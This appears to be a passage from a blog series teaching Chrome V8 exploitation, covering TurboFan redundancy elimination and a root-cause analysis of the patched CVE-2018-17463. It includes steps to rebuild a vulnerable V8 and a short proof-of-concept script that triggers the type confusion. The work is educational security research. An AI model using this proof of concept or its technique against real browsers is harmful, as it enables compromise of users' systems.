- Replacement of #34: JSLoadProperty[sloppy, FeedbackSource(#2)](14, 30, 5, 4, 35, 31, 26) with #47: LoadElement[tagged base, 8, Signed31, kRepTaggedSigned|kTypeInt32, FullWriteBarrier](44, 46, 46, 26) by reducer JSNativeContextSpecialization
- Replacement of #42: Checkpoint(33, 31, 26) with #31: Checkpoint(33, 21, 26) by reducer CheckpointElimination
- In-place update of #36: NumberConstant[0] by reducer Typer
... snip ...
- In-place update of #26: Merge(24, 27) by reducer BranchElimination
- In-place update of #43: CheckMaps[None, 0x00c80024dcb9 <Map[16](PACKED_SMI_ELEMENTS)>, FeedbackSource(INVALID)](61, 62, 26) by reducer RedundancyElimination
- Replacement of #43: CheckMaps[None, 0x00c80024dcb9 <Map[16](PACKED_SMI_ELEMENTS)>, FeedbackSource(INVALID)](61, 62, 26) with #62: CheckInternalizedString(2, 18, 8) by reducer LoadElimination
- In-place update of #44: LoadField[JSObjectElements, tagged base, 8, Internal, kRepTaggedPointer|kTypeAny, PointerWriteBarrier, mutable](61, 62, 26) by reducer RedundancyElimination
- Replacement of #44: LoadField[JSObjectElements, tagged base, 8, Internal, kRepTaggedPointer|kTypeAny, PointerWriteBarrier, mutable](61, 62, 26) with #50: HeapConstant[0x00c800259811 <FixedArray[3]>] by reducer LoadElimination
- In-place update of #45: LoadField[JSArrayLength, tagged base, 12, Range(0, 134217725), kRepTaggedSigned|kTypeInt32, NoWriteBarrier, mutable](61, 62, 26) by reducer RedundancyElimination
- Replacement of #45: LoadField[JSArrayLength, tagged base, 12, Range(0, 134217725), kRepTaggedSigned|kTypeInt32, NoWriteBarrier, mutable](61, 62, 26) with #59: NumberConstant[3] by reducer LoadElimination
... snip ...

There’s a lot of interesting output from that flag, and as you can see there is a lot of different reducers and eliminations that are executed. We’ll briefly cover a few of them later in this post, but I want you to look careful at a few of these reductions.

For example, this one:

In-place update of #43: CheckMaps[None, 0x00c80024dcb9 <Map[16](PACKED_SMI_ELEMENTS)>, FeedbackSource(INVALID)](61, 62, 26) by reducer RedundancyElimination

Yah, you read that correctly - CheckMaps was updated and later replaced due to the RedundancyElimination reducer. The reason this happened is because redundancy elimination detected that the CheckMaps call was a redundant check and removed all but the first one in the same control-flow path.

At this point I know what a few of you might be thinking, β€œIsn’t that a security vulnerability”? The answer to that is β€œpotentially” and β€œit depends”.

Before I explain this in a bit more detail, let’s take a look at the following code example:

function hot_function(obj) {
	return obj.a + obj.b;
}

As you can see, this code is pretty simple. It takes in one object and returns the sum of the values from property a and property b. If we look into the Typer optimization graph, we will see the following.

As you can see, when we enter our function, we first call CheckMaps to validate that the map of the object we are passing in corresponds to having both the a and b properties. If that check passes, we then call LoadField to load in offset 12 from the Parameter constant, which is the a property from the obj object that we passed in.

Right after that, we do another CheckMaps call to validate the map again, and then load property b. Once that’s done, we call the JSAdd function to either add numbers, strings, or both together.

The issue here is the redundant CheckMaps call, because as we know it, the map of this object that we are passing in can’t change between the two CheckMap operations. In that case, it will be removed.

We can see this redundancy elimination within the simplified lower phase of the graph.

As you can clearly see, the second CheckMaps node has now been removed and after the first check we simply load both of the properties one after another - in essence speeding up our code. Also, due to simplified lowering the JSAdd call has been lowered down to the machine code variant to validate both integer and string expressions as per the ECMAScript standard.

So going back to our question on if this is a security vulnerability or not. As stated, β€œit depends”. The reason for this is that certain operation can cause side-effects to the observable execution of our context - that’s why we have side effect chains. If TurboFan for some reason forgot to take into account a side-effect and doesn’t write it to the side-effect chain, then it’s possible that the Map of the object can change during execution, such as another user function call modifying the object or adding a property.

Each intermediate representation operation in V8 has various flags associated with it. An example of a few of the flags for JavaScript operators can be seen in v8/src/compiler/js-operator.cc Some of these flags have specific assumptions around them.

For example, V(ToString, Operator::kNoProperties, 1, 1) assumes that a String should have no properties. Another one such as V(LoadMessage, Operator::kNoThrow | Operator::kNoWrite, 0, 1) assumes that the LoadMessage operation will not have observable side-effects via the kNoWrite flag. This kNoWrite flag does not actually write to the effect chain.

As you can see, if we can get the compiler to remove a redundancy check for an operation that seemingly thinks there are no side-effects, then you have a potentially exploitable bug if you can modify an object or property during the execution of the compiled code.

This topic on redundancy elimination and side-effects initially can be expanded on to discuss how bugs steming from these elimination checks can lead to exploitable vulnerabilities. But before we do that, let’s juts quickly brief over some other common optimizations.

Other Optimizations

As previously seen from the output of the --trace_turbo_reduction flag, there are a lot more optimizations that occur in TurboFan then what we talked about. I tried to cover the most important ones that are related to the bug we will be exploiting in Part 3, but I still want to quickly cover some of the other optimizations so at least you have a general gist of what they are.

Some of the other common optimizations you will see in TurboFan are as follows:

  • Control Optimization: As defined in v8/src/compiler/control-flow-optimizer.cc, generally this optimization works on optimizing the flow of the graph and turns certain branch chains into switches.
  • Alias Analysis & Global Value Numbering: Alias analysis identifies dependencies between Store and Load nodes. So, if two load operations are dependent on one, they can’t be executed till the first operation is complete, i.e. x = 2; y = x + 2; z = x + 2. GVN or Global Value Numbering follows suite, and removes redundant Store and Load operations, i.e., z = x + 2 can be removed and z can be set to y since the operation is redundant.
  • Dead Code Elimination (DCE): Dead Code Elimination is exactly what it sounds like. It simply iterates through all the nodes and removes the code that won’t be executed. Such as if x and y for a True/False statement are always true, the false path will be considered β€œdead” and removed.

If you would like to learn more about the different optimizations and learn more about the Sea of Nodes I suggest reading β€œTurboFan JIT Design”, and β€œIntroduction to TurboFan”.

Common JIT Compiler Vulnerabilities

With an understanding of the full V8 pipeline, and the compiler optimizations, we can now start looking at and understanding what type of vulnerability classes are present in browsers. As we know it, the JavaScript engine and all its components such as the compiler are all implemented in C++.

In that case the pipeline is first and foremost vulnerable to common memory and type safety violations, such as integer overflows and underflows, off-by-one errors, out-of-bound reads and writes, buffer overflows, heap overflows, and of course use-after-free bugs to name a few.

In addition to the usual C++ bugs, we also can have logic bugs and machine-code generation bugs that can occur during the optimization phase due to the nature of speculative assumptions. Such logic bugs can stem from the incorrect assumption of the potential side-effects an operation can have on an object or property or from improper optimization passes which remove critical type guards.

These types of issues are generally known as β€œtype-confusion” vulnerabilities where the compiler doesn’t verify the type or shape of the object that is passed to it, resulting in the compiler blindly using the object. This was the case in CVE-2018-17463, which we will attempt to analyze and exploit in Part 3 of this blog.

At this point of the blog, I considered diving into analyzing a few bugs and showing you examples of vulnerable code. In the end, I decided not to do that. Why? Well, at this point of the series you should have a good enough understanding of browser internals and V8 to be able to look through Chromium code and understand certain bug reports on your own.

So, here’s some homework for you, the reader. I will provide you with a list of videos and bug reports relating around browser exploitation. Take the time to read through some of these reports, and understand how these bugs came to be, and what allowed them to be exploited.

Do note that some of these bugs are in other JavaScript engines, but regardless, they provide you a representation of the possible vulnerabilities that can stem in all JavaScript Engines.

I recommend reading the following:

Closing

Well that about does it for this post! Thanks for sticking around to the end and reading though all of this, as there was a lot of complex material that was covered. I can’t even count the number of times I had to go back and edit this initial draft of the blog post while learning all of this myself.

Hopefully a lot of the material that was presented here was easily understandable. And if it wasn’t, then again just as with my first post - take the time to read through this and utilize the links within the blog and references section to help you understand some of the concepts that are unclear.

Honestly, what helped me learn the most was reading through and debugging the V8 code. This gives you a much better idea of what happens under the hood and what is called where and when. This also helps you get more familiarized with the code if you’re trying to review it for bugs.

Anyway, with all the information that we covered here, the optimizations portion will be the most important for us in the next post. In part three of this blog post series, we’ll take everything we know to analyze and understand CVE-2018-17463. Afterwards, we’ll jump into understanding the basics around browser exploitation primitives, and then we’ll go through and actually exploit the bug to get remote code execution on the system.

With that being said, thanks for reading and I’ll see you in the next post!

Kudos

I would like to sincerely thank maxpl0it for doing a thorough technical review of this blog post, for providing critical feedback and adding in a few important details before it’s release.

I also want to thank Connor McGarr and V3ded for taking the time to proofread this post for accuracy and readability. Thank you for your time guys!

Finally, I want to give a shout out to Jeremy Fetiveau for his amazing work in the Chrome exploitation space, and for writing such detailed blog posts for Diary of a Reverse Engineer. These posts were immensely helpful in understanding a lot of the nuances in Chrome and V8.

References

Chrome Browser Exploitation, Part 3: Analyzing and Exploiting CVE-2018-17463

29 December 2022 at 00:00

Welcome to the third and final installment of the β€œChrome Browser Exploitation” series. The main objective of this series has been to provide an introduction to browser internals and delve into the topic of Chrome browser exploitation on Windows in greater depth.

In Part 1 of the series, we examined the inner workings of JavaScript and V8. This included an exploration of objects, maps, and shapes, as well as an overview of memory optimization techniques such as pointer tagging and pointer compression.

In Part 2 of the series, we took a more in-depth look at the V8 compiler pipeline. We examined the role of Ignition, Sparkplug, and TurboFan in the pipeline and covered topics such as V8’s bytecode, code compilation, and code optimization.

In today’s blog post, we will be focusing on the analysis and exploitation of CVE-2018-17463 which was a JIT Compiler Vulnerability in TurboFan. This vulnerability arose from the improper side-effect modeling of the JSCreateObject operation during the lowering optimization phase. Before we delve into exploiting this bug, we will first learn about fundamental browser exploitation primitives, such as addrOf and fakeObj, and how we can use our bug to exploit type confusions.

Warning: Please be aware that this blog post is a detailed, in-depth read, as it goes through the exploitation process step by step. As such, it is a very heavy read. If you only want to read a specific part of the blog, there is a table of contents provided for your convenience.

The following topics will be discussed in this post:

  • Understanding Patch Gapping
  • Root Cause Analysis of CVE-2018-17463
  • Setting Up Our Environment
  • Generating a Proof of Concept
  • Exploiting a Type Confusion for JSCreateObject
  • Understanding Browser Exploit Primitives
    • The addrOf Read Primitive
    • The fakeObj Write Primitive
  • Gaining Memory Read + Write Access
  • Gaining Code Execution within V8
    • Basic WebAssembly Internals
    • Abusing WebAssembly Memory

Alright, with that being said, let’s jump in and do this!

Understanding Patch Gapping

In September 2018, IssueΒ 888923 was reported to Google’s Security Team through the Beyond Security’s SecuriTeam Secure Disclosure program. The bug was discovered by Samuel Gross through source code review and was used as part of the Hack2Win competition. A month after the bug was fixed, it was made public via an SSD Advisory titled β€œChrome Type Confusion in JSCreateObject Operation to RCE” which provided some details about the bug and released a detailed proof of concept for its exploitation.

Within the same month, Samuel gave a talk at BlackHat 2018 called β€œAttacking Client-Side JIT Compilers” in which he discussed vulnerabilities in JIT compilers, particularly those related to redundancy elimination and the modeling of side effects within IR. It wasn’t until 2021 that Samuel released a Phrack article titled β€œExploiting Logic Bugs in JavaScript JIT Engines” which provided a more in-depth explanation of how CVE-2018-17463 was discovered and exploited.

It’s worth noting that a significant amount of information about this bug was made public within a few weeks of its discovery. This means that attackers could have used this information to reverse engineer and exploit the bug. However, the issue with this is that most, if not all, Chrome browsers would have already been patched automatically within a few days or even weeks after the initial commit for the fix was pushed, rendering the bug useless.

Instead of relying on publicly available information about potential bugs, many attackers and exploit engineers track commits looking for specific keywords. When they find a commit that looks promising, they will try to figure out the underlying bug, a practice known as β€œpatch gapping”.

As explained within Exodus’s post β€œPatch Gapping Google Chrome” they detail patch-gapping as being β€œthe practice of exploiting vulnerabilities in open-source software that are already fixed (or are in the process of being fixed) by the developers before the actual patch is shipped to users”.

Why is this relevant to our discussion of Chrome browser exploitation? Well, by understanding the concept of patch gapping it allows us to adopt more of an β€œadversary mindset.” After learning so much about the internals of V8, we now should have a good enough understanding to be able to spot a potential bug in Chrome’s code from an initial commit.

By taking this approach, we can widen the window of opportunity for exploiting a bug, as well as broaden our knowledge of Chrome’s codebase. Additionally, by observing locations in the code that are frequently patched, we can get a sense of where we should look for potential 0-day vulnerabilities in Chrome.

With that in mind, let’s begin our root analysis by looking at the initial commit that was pushed to fix the bug we’re examining. We’ll try to reverse engineer the fix and figure out how to trigger the bug using the knowledge we acquired. If we get stuck, we’ll use the already existing public resources to help us. After all, this is a journey through browser exploitation, and sometimes a journey is never an easy one!

Root Cause Analysis of CVE-2018-17463

Looking into Issue 888923 we can see that the initial patch for this bug was pushed with commit 52a9e67a477bdb67ca893c25c145ef5191976220 with the message of β€œ[turbofan] Fix ObjectCreate’s side effect annotation”. Knowing this, let’s use the git show command within our V8 directory to see what that commit fixed.

C:\dev\v8\v8>git show 52a9e67a477bdb67ca893c25c145ef5191976220
commit 52a9e67a477bdb67ca893c25c145ef5191976220
Author: Jaroslav Sevcik <[email protected]>
Date:   Wed Sep 26 13:23:47 2018 +0200

    [turbofan] Fix ObjectCreate's side effect annotation.

    Bug: chromium:888923
    Change-Id: Ifb22cd9b34f53de3cf6e47cd92f3c0abeb10ac79
    Reviewed-on: https://chromium-review.googlesource.com/1245763
    Reviewed-by: Benedikt Meurer <[email protected]>
    Commit-Queue: Jaroslav Sevcik <[email protected]>
    Cr-Commit-Position: refs/heads/master@{#56236}

diff --git a/src/compiler/js-operator.cc b/src/compiler/js-operator.cc
index 94b018c987..5ed3f74e07 100644
--- a/src/compiler/js-operator.cc
+++ b/src/compiler/js-operator.cc
@@ -622,7 +622,7 @@ CompareOperationHint CompareOperationHintOf(const Operator* op) {
   V(CreateKeyValueArray, Operator::kEliminatable, 2, 1)                \
   V(CreatePromise, Operator::kEliminatable, 0, 1)                      \
   V(CreateTypedArray, Operator::kNoProperties, 5, 1)                   \
-  V(CreateObject, Operator::kNoWrite, 1, 1)                            \
+  V(CreateObject, Operator::kNoProperties, 1, 1)                       \
   V(ObjectIsArray, Operator::kNoProperties, 1, 1)                      \
   V(HasProperty, Operator::kNoProperties, 2, 1)                        \
   V(HasInPrototypeChain, Operator::kNoProperties, 2, 1)                \
diff --git a/test/mjsunit/compiler/regress-888923.js b/test/mjsunit/compiler/regress-888923.js
new file mode 100644
index 0000000000..e352673b7d
--- /dev/null
+++ b/test/mjsunit/compiler/regress-888923.js
@@ -0,0 +1,31 @@
+// Copyright 2018 the V8 project authors. All rights reserved.
+// Use of this source code is governed by a BSD-style license that can be
+// found in the LICENSE file.
+
+// Flags: --allow-natives-syntax
+
+(function() {
+  function f(o) {
+    o.x;
+    Object.create(o);
+    return o.y.a;
+  }
+
+  f({ x : 0, y : { a : 1 } });
+  f({ x : 0, y : { a : 2 } });
+  %OptimizeFunctionOnNextCall(f);
+  assertEquals(3, f({ x : 0, y : { a : 3 } }));
+})();
+
+(function() {
+  function f(o) {
+    let a = o.y;
+    Object.create(o);
+    return o.x + a;
+  }
+
+  f({ x : 42, y : 21 });
+  f({ x : 42, y : 21 });
+  %OptimizeFunctionOnNextCall(f);
+  assertEquals(63, f({ x : 42, y : 21 }));
+})();

Upon examining this commit, we can see that it only fixed a single line of code in the src/compiler/js-operator.cc file. The fix simply replaced the Operator::kNoWrite flag with the Operator::kNoProperties flag for the CreateObject JavaScript operation.

If you remember back in Part 2 of this series, we briefly discussed these flags and explained that they are used by intermediate representation (IR) operations. In this case, the kNoWrite flag indicates that the CreateObject operation will not have observable side effects, or in other words, observable changes to the execution of the context.

This poses a problem for the compiler. As we know, certain operations can have side effects that cause observable changes to the context. For example, if an object that was passed in had its object Map changed or modified - that’s an observable side effect that needs to be written to the chain of operations. Otherwise, certain optimization passes, such as redundancy elimination, may remove what the compiler believes is a β€œredundant” CheckMap operation when in reality it was a required check. Essentially this can lead to a type confusion vulnerability.

So let’s validate if the CreateObject function does in fact have an observable side-effect.

To determine whether an IR operation has side effects, we need to look at the lowering phase of the optimizing compiler. This phase converts high-level IR operations into lower-level instructions for JIT compilation and is also where redundancy elimination occurs.

For the CreateObject JavaScript operation, the lowering happens within the v8/src/compiler/js-generic-lowering.cc source file, specifically within the LowerJSCreateObject function.

void JSGenericLowering::LowerJSCreateObject(Node* node) {
  CallDescriptor::Flags flags = FrameStateFlagForCall(node);
  Callable callable = Builtins::CallableFor(
      isolate(), Builtins::kCreateObjectWithoutProperties);
  ReplaceWithStubCall(node, callable, flags);
}

Looking at lowering function, we can see that the JSCreateObject IR operation will be lowered to a call to the builtin function CreateObjectWithoutProperties, located within the v8/src/builtins/object.tq source file.

transitioning builtin CreateObjectWithoutProperties(implicit context: Context)(
    prototype: JSAny): JSAny {
  try {
    let map: Map;
    let properties: NameDictionary|SwissNameDictionary|EmptyFixedArray;
    typeswitch (prototype) {
      case (Null): {
        map = *NativeContextSlot(
            ContextSlot::SLOW_OBJECT_WITH_NULL_PROTOTYPE_MAP);
        @if(V8_ENABLE_SWISS_NAME_DICTIONARY) {
          properties =
              AllocateSwissNameDictionary(kSwissNameDictionaryInitialCapacity);
        }
        @ifnot(V8_ENABLE_SWISS_NAME_DICTIONARY) {
          properties = AllocateNameDictionary(kNameDictionaryInitialCapacity);
        }
      }
      case (prototype: JSReceiver): {
        properties = kEmptyFixedArray;
        const objectFunction =
            *NativeContextSlot(ContextSlot::OBJECT_FUNCTION_INDEX);
        map = UnsafeCast<Map>(objectFunction.prototype_or_initial_map);
        if (prototype != map.prototype) {
          const prototypeInfo = prototype.map.PrototypeInfo() otherwise Runtime;
          typeswitch (prototypeInfo.object_create_map) {
            case (Undefined): {
              goto Runtime;
            }
            case (weak_map: Weak<Map>): {
              map = WeakToStrong(weak_map) otherwise Runtime;
            }
          }
        }
      }
      case (JSAny): {
        goto Runtime;
      }
    }
    return AllocateJSObjectFromMap(map, properties);
  } label Runtime deferred {
    return runtime::ObjectCreate(prototype, Undefined);
  }
}

There’s a lot of code within this function. We don’t need to understand it all, but to put it simply this function begins the process of creating a new object without properties. One interesting aspect of this function is the typeswitch for the object’s prototype.

The reason this is interesting for us is because of an optimization trick within V8. In JavaScript each object has a private property that holds a link to another object called a prototype. In simple term, a prototype is similar to a class in C++ where objects can inherit features from certain classes. That prototype object has its own prototype, and so does the prototype of the prototype, forming a β€œprototype chain” that continues until an object of the null value is reached.

I won’t go into too much detail on prototypes in this post, but you can read β€œObject Prototypes” and β€œInheritance and the Prototype Chain” for a better understanding of this concept. For now, let’s focus on the interesting optimization of prototypes in V8.

In V8, each prototype has a unique shape that is not shared with any other objects, specifically not with other prototypes. Whenever the prototype of an object is changed, a new shape is allocated for that prototype. I suggest reading β€œJavaScript Engine Fundamentals: Optimizing Prototypes” for more information on this optimization.

Because of this, we want to play close attention to the code due to the fact that the optimization of prototypes is a side effect that could have consequences if not properly modeled.

In the end, the CreateObjectWithoutProperties function ends up calling the ObjectCreate function, which a C++ runtime builtin located in v8/src/objects/js-objects.cc. Back in the 2018 codebase this function was located within the v8/src/objects.cc file.

// 9.1.12 ObjectCreate ( proto [ , internalSlotsList ] )
// Notice: This is NOT 19.1.2.2 Object.create ( O, Properties )
MaybeHandle<JSObject> JSObject::ObjectCreate(Isolate* isolate,
                                             Handle<Object> prototype) {
  // Generate the map with the specified {prototype} based on the Object
  // function's initial map from the current native context.
  // TODO(bmeurer): Use a dedicated cache for Object.create; think about
  // slack tracking for Object.create.
  Handle<Map> map =
      Map::GetObjectCreateMap(isolate, Handle<HeapObject>::cast(prototype));

  // Actually allocate the object.
  return isolate->factory()->NewFastOrSlowJSObjectFromMap(map);
}

Peeking into the ObjectCreate function we can see that this function generates a new map for the object based off our previous object’s prototype using the GetObjectCreateMap function, which is located in v8/src/objects/map.cc.

At this point we should already start seeing where the potential side-effects are within this JavaScript operator.

// static
Handle<Map> Map::GetObjectCreateMap(Isolate* isolate,
                                    Handle<HeapObject> prototype) {
  Handle<Map> map(isolate->native_context()->object_function().initial_map(),
                  isolate);
  if (map->prototype() == *prototype) return map;
  if (prototype->IsNull(isolate)) {
    return isolate->slow_object_with_null_prototype_map();
  }
  if (prototype->IsJSObject()) {
    Handle<JSObject> js_prototype = Handle<JSObject>::cast(prototype);
    if (!js_prototype->map().is_prototype_map()) {
      JSObject::OptimizeAsPrototype(js_prototype); // <== Side Effect
    }
    Handle<PrototypeInfo> info =
        Map::GetOrCreatePrototypeInfo(js_prototype, isolate);
    // TODO(verwaest): Use inobject slack tracking for this map.
    if (info->HasObjectCreateMap()) {
      map = handle(info->ObjectCreateMap(), isolate);
    } else {
      map = Map::CopyInitialMap(isolate, map);
      Map::SetPrototype(isolate, map, prototype);
      PrototypeInfo::SetObjectCreateMap(info, map);
    }
    return map;
  }

  return Map::TransitionToPrototype(isolate, map, prototype); // <== Side Effect
}

Within the GetObjectCreateMap function, we can see two interesting calls to JSObject::OptimizeAsPrototype and Map::TransitionToPrototype. This is interesting for us because this code implies and further confirms that the newly created object is converted to a prototype object, which also changes the object’s associated map.

Knowing this, let’s jump into d8 and validate that the Object.create function does indeed modify an object and the map in some way that can be exploitable to us. To start, let’s launch d8 with the --allow-natives-syntax options and create a new object, like so.

let obj = {x:13};

From here, let’s execute the %DebugPrint function against our object to see its map and associated properties.

d8> %DebugPrint(obj)
DebugPrint: 000002A50010A505: [JS_OBJECT_TYPE]
 - map: 0x02a5002596f5 <Map[16](HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x02a500244669 <Object map = 000002A500243D25>
 - elements: 0x02a500002259 <FixedArray[0]> [HOLEY_ELEMENTS]
 - properties: 0x02a500002259 <FixedArray[0]>
 - All own properties (excluding elements): {
    000002A5000041ED: [String] in ReadOnlySpace: #x: 13 (const data field 0), location: in-object
 }
000002A5002596F5: [Map] in OldSpace
 - type: JS_OBJECT_TYPE
 - instance size: 16
 - inobject properties: 1
 - elements kind: HOLEY_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - stable_map
 - back pointer: 0x02a5002596cd <Map[16](HOLEY_ELEMENTS)>
 - prototype_validity cell: 0x02a5002043cd <Cell value= 1>
 - instance descriptors (own) #1: 0x02a50010a515 <DescriptorArray[1]>
 - prototype: 0x02a500244669 <Object map = 000002A500243D25>
 - constructor: 0x02a50024422d <JSFunction Object (sfi = 000002A50021BA25)>
 - dependent code: 0x02a5000021e1 <Other heap object (WEAK_ARRAY_LIST_TYPE)>
 - construction counter: 0

From initial review of the output, we can see that the map of the object is that of FastProperties which corresponds to our object having in-object properties. Now, let’s execute the Object.create function against our object, and print out its debug information.

d8> Object.create(obj)
d8> %DebugPrint(obj)
DebugPrint: 000002A50010A505: [JS_OBJECT_TYPE]
 - map: 0x02a50025a9c9 <Map[16](HOLEY_ELEMENTS)> [DictionaryProperties]
 - prototype: 0x02a500244669 <Object map = 000002A500243D25>
 - elements: 0x02a500002259 <FixedArray[0]> [HOLEY_ELEMENTS]
 - properties: 0x02a50010c339 <NameDictionary[17]>
 - All own properties (excluding elements): {
   x: 13 (data, dict_index: 1, attrs: [WEC])
 }
000002A50025A9C9: [Map] in OldSpace
 - type: JS_OBJECT_TYPE
 - instance size: 16
 - inobject properties: 1
 - elements kind: HOLEY_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - dictionary_map
 - may_have_interesting_symbols
 - prototype_map
 - prototype info: 0x02a50025a9f1 <PrototypeInfo>
 - prototype_validity cell: 0x02a5002043cd <Cell value= 1>
 - instance descriptors (own) #0: 0x02a5000021ed <Other heap object (STRONG_DESCRIPTOR_ARRAY_TYPE)>
 - prototype: 0x02a500244669 <Object map = 000002A500243D25>
 - constructor: 0x02a50024422d <JSFunction Object (sfi = 000002A50021BA25)>
 - dependent code: 0x02a5000021e1 <Other heap object (WEAK_ARRAY_LIST_TYPE)>
 - construction counter: 0

As you can see, when Object.create is called, the map of the object is changed from a FastProperties map with in-object properties to a DictionaryProperties map where these properties are now stored in a dictionary. This side-effect invalidates the kNoWrite flag for the ObjectCreate intermediate representation (IR) operation, proving that this assumption is flawed.

In this case, if we can get a CheckMap operation to be eliminated through redundancy elimination before the call to Object.create, then we can trigger a type confusion vulnerability. The type confusion will occur when the engine will try to access the out-of-line properties within the properties backing store. The engine expects the properties backing store to be a FixedArray where each property is stored one after another, but instead it will now point to a more complex NameDictionary.

Setting Up Our Environment

Before we can move on to analyzing and exploiting this bug, we first need to set up our development environment. If you have been following this blog post series since Part 1, you likely already have a working version of d8 after following the instructions in my β€œBuilding Chrome V8 on Windows” guide.

Since this bug is from 2018, there have been a lot of changes to the Chromium codebase along with changes to the dependencies required to build newer versions. To reproduce this bug you can simply just apply the below diff patch to the src/compiler/js-operator.cc file:

diff --git a/src/compiler/js-operator.cc b/src/compiler/js-operator.cc
index 8af8e7d32f..63edfa9684 100644
--- a/src/compiler/js-operator.cc
+++ b/src/compiler/js-operator.cc
@@ -750,7 +750,7 @@ Type JSWasmCallNode::TypeForWasmReturnType(const wasm::ValueType& type) {
   V(CreateKeyValueArray, Operator::kEliminatable, 2, 1)                  \
   V(CreatePromise, Operator::kEliminatable, 0, 1)                        \
   V(CreateTypedArray, Operator::kNoProperties, 5, 1)                     \
-  V(CreateObject, Operator::kNoProperties, 1, 1)                         \
+  V(CreateObject, Operator::kNoWrite, 1, 1)                              \
   V(ObjectIsArray, Operator::kNoProperties, 1, 1)                        \
   V(HasInPrototypeChain, Operator::kNoProperties, 2, 1)                  \
   V(OrdinaryHasInstance, Operator::kNoProperties, 2, 1)                  \

However, during my testing, while I was able to trigger the bug, I was not able to actually get a working type confusion and abuse the addrOf and fakeObj primitives (which we will discuss later in the post). I am not sure why this was the case, but it could be that a code change between 2018 and 2022 patched part of the codebase that was required for these primitives.

UPDATE: The reason that this type confusion wasn’t working on newer versions of V8 after the diff patch, was due to the fact that the V8 Heap Sandbox was enabled. This sandbox essentially prevents an attacker from corrupting V8 objects such as the ArrayBuffer.

After applying the patch, it’s potentially possible to disable the V8 Heap Sandbox via the V8_VIRTUAL_MEMORY_CAGE flag being set to False which was introduced in Change 3010195. I haven’t tested this personally, so I can’t guarantee this will work.

UPDATE 2: If you want to apply this patch to newer versions of V8 and follow along, you can modify the BUILD.gn file and set v8_enable_sandbox, v8_enable_pointer_compression, and v8_enable_pointer_compression_shared_cage to false. Afterwards, you should be able to rebuild V8 by following the original build instructions.

Instead, what I opted to do was to check out the last β€œvulnerable” commit before the bug fix and built v8 and d8 again. This itself posed some problems, as in 2018 Chrome required Visual Studio 2017, but in our current environment we have Visual Studio 2019. While it is still possible to build Chrome with Visual Studio 2019, we need to install some prerequisites first.

To start, open Visual Studio 2019 Installer, and install the following additional components:

  • MSVC v140 - VS 2015 C++ build tools (v14.00)
  • MSVC v141 - VS 2017 C++ x64/x86 build tools (v14.16)
  • Windows 10 SDK (10.0.17134.0)

Once those components are installed, we need to add the following Environmental Variables:

  • Add the vs2017_install User Variable and set it to C:\Program Files (x86)\Microsoft Visual Studio 14.0\
  • Add C:\Program Files (x86)\Windows Kits\10\bin\10.0.17134.0\x64 to the User Path Variable.

Once that’s configured, we now need to modify the V8 codebase. If we look into the git log of commit 52a9e67a477bdb67ca893c25c145ef5191976220 we’ll see that the last vulnerable commit before the bug fix was 568979f4d891bafec875fab20f608ff9392f4f29.

With that commit in hand, we can run the git checkout command to update the files in the V8 directory and match the version of the last vulnerable commit.

C:\dev\v8\v8>git checkout 568979f4d891bafec875fab20f608ff9392f4f29
HEAD is now at 568979f4d8 [parser] Fix memory accounting of explicitly cleared zones

After setting that up, delete the x64.debug directory in the v8\v8\out\ folder to avoid errors. Next, modify the build/toolchain/win/tool_wrapper.py build script to match the contents of the tool_wrapper.py file after the fix was applied to remove the superflush hack due to a build error reported in Issue 1033106.

Once you have modified the tool_wrapper.py file, you can build the debug version of d8 with the following commands:

C:\dev\v8\v8>gn gen --ide=vs out\x64.debug
C:\dev\v8\v8>cd out\x64.debug
C:\dev\v8\v8\out\x64.debug>msbuild all.sln

This build may take a while to complete, so go get a coffee while you wait. β˜•

Once the build is completed, you should be able to launch d8 and successfully run the poc.js script from the SSD Advisory to confirm that you can create a working read/write primitive.

Generating a Proof of Concept

Now that we have a vulnerable version of V8 and understand the underlying bug, we can start writing our proof of concept. Let’s start by recapping what we need this proof of concept to do:

  1. Create a new object with an inline-property that will be used as our prototype for Object.create.
  2. Add a new out-of-line property to the object’s property backing store, which we will attempt to access after the Map transition.
  3. Force a CheckMap operation on the object to trigger redundancy elimination, which will remove subsequent CheckMap operations.
  4. Call Object.create with the previously created object to force a Map transition.
  5. Access the out-of-line property of our object.
    • Due to the CheckMap redundancy elimination, the engine will dereference the property pointer thinking it’s an array. However, it now points to a NamedDictionary, allowing us to access different data.

On the surface, this may seem straightforward. However, it’s important to note that bugs can often be more complex in practice than in theory, particularly when it comes to triggering or exploiting them. Therefore, the hardest part is usually triggering the bug and getting a type confusion to work. Once that is achieved, the process toward exploitation tends to be smoother.

So, how do we begin?

Fortunately for us, if we examine the diff for 52a9e67a477bdb67ca893c25c145ef5191976220, we will notice that the Chrome team added a regression test case in the commit. A regression test is used to verify that any updates or modifications to an application do not affect its overall functionality. In this case, the regression file appears to be testing for our bug!

Let’s take a look at this test case and see what we can work with.

// Flags: --allow-natives-syntax

(function() {
  function f(o) {
    o.x;
    Object.create(o);
    return o.y.a;
  }

  f({ x : 0, y : { a : 1 } });
  f({ x : 0, y : { a : 2 } });
  %OptimizeFunctionOnNextCall(f);
  assertEquals(3, f({ x : 0, y : { a : 3 } }));
})();

From the top of the code, we can see that a new function f is created which accepts an object o. When this function is called, it performs the following actions on the passed-in object:

  1. It access property a of object o, which should force a CheckMap operation.
  2. Calls Object.create on object o, which should force a Map transition.
  3. Accesses an out-of-bound property of a in the passed-in object y, which should trigger the type-confusion.

We can see that this function is called twice with simple objects and properties, and then %OptimizeFunctionOnNextCall is called, which forces V8 to pass the function to TurboFan for optimization. This prevents us from needing to run a loop to make the function β€œhot”. The function is then called for a third time, which should trigger our bug.

As you can see, the assert method is called to check that the value of 3 is returned. If it is not, it’s possible that the bug is still present.

This is helpful for us because we now have a working proof of concept that we can use. Although, I’m not sure why they are using a object within the properties backing store instead of a value. Guess we’ll figure that out later.

With this information, let’s build our own proof of concept script by using the information we have gathered. Afterwards, we’ll perform a few checks to make sure that we indeed have a working type confusion, and we’ll also use Turbolizer to validate that the CheckMap operation is indeed removed via redundancy elimination.

Our proof of concept should look like so:

function vuln(obj) {
    // Access Property a of obj, forcing a CheckMap operation
    obj.a;

    // Force a Map Transition via our side-effect
    Object.create(obj)

    // Trigger our type-confusion by accessing an out-of-bound property
    return obj.b;
}

vuln({a:42, b:43}); // Warm-up code
vuln({a:42, b:43});
%OptimizeFunctionOnNextCall(vuln); // JIT Compile vuln
vuln({a:42, b:43}); // Trigger type-confusion - should not return 43!

